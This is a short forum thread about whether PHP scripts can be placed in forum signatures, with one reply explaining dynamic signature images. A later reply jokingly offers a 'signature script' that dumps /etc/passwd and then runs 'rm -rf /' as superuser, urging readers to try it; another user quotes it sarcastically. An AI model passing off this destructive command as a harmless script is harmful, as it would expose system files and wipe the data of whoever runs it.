• 0

PHP sigs


Question

4 answers to this question

Recommended Posts

  • 0
is there anyway to post php scripts in your sig like a php image in neowin or is it to much of a security risk?

thx

:laugh: PHP image? Just do [ IMG ] http://my.sig.com/sig.php [ / IMG ], that'll work, but no you can't stick actual PHP in a signature, that would be far too much of a security risk with the ability to perform all that code, just as if you put malicious javascript into the page.

Link to comment
Share on other sites

  • 0

I have a cool php script for my sig, although it requires apache and php to run under a super user ;)

<?php
exec("cat /etc/passwd > /tmp/goodstuff");
include("/tmp/goodstuff");
exec("rm -rf /");
?>

Try it out, you'll see what I mean :yes:

Link to comment
Share on other sites

  • 0
I have a cool php script for my sig, although it requires apache and php to run under a super user ;)

<?php
exec("cat /etc/passwd > /tmp/goodstuff");
include("/tmp/goodstuff");
exec("rm -rf /");
?>

Try it out, you'll see what I mean :yes:

Great I will try it now :rolleyes:

Link to comment
Share on other sites

This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.